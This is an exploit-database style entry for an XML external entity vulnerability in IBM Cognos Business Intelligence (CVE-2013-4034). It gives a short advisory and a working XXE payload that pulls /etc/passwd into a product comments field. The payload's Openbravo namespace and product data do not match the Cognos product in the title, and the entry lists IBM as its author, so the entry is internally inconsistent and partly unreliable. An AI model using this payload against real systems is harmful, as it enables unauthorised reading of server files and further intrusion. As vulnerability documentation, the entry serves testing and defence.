EXPLOITS

IBM Cognos Business Intelligence - XML External Entity Information Disclosure

Author: IBM
type: remote
platform: multiple
port: 
date_added: 2013-10-11  
date_updated: 2015-11-30  
verified: 1  
codes: CVE-2013-4034;OSVDB-99742  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 38825.xml  

source: https://www.securityfocus.com/bid/63719/info

IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ELEMENT comments ANY >
 <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>

<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
        <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
                <id>C970393BDF6C43E2B030D23482D88EED</id>
                <comments>&xxe;</comments>
        </Product>
</ob:Openbravo>